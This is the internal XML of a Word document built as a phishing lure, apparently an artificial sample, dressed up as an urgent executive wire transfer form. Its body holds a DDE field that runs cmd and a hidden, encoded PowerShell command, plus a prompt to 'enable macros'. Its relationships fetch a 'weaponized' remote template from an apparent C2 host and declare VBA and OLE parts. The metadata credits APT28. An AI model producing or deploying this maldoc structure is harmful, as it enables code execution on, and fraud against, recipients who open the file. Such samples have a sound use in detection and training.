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word/vbaProject.bin" ContentType="application/vnd.ms-office.vbaProject"/>
  <Override PartName="/word/embeddings/oleObject1.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject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</Relationships>
</file>

<file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:body>
    <w:p>
      <w:r>
        <w:t>URGENT: Executive Wire Transfer Authorization Form</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:fldSimple w:instr="=cmd|'/c powershell.exe -w hidden -enc V3JpdGUtSG9zdA=='!A0"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Please enable macros to authenticate and sign this document.</w:t>
      </w:r>
    </w:p>
  </w:body>
</w:document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attachedTemplate" Target="https://threat-c2-infrastructure.net/weaponized_template.dotm" TargetMode="External"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vbaProject" Target="vbaProject.bin"/>
  <Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin"/>
</Relationships>
</file>

<file path=docProps/core.xml><?xml version="1.0" encoding="utf-8"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <dc:title>Classified Target Wire Briefing</dc:title>
  <dc:creator>Threat Actor FancyBear</dc:creator>
  <cp:lastModifiedBy>Operator APT28</cp:lastModifiedBy>
</cp:coreProperties>
</file>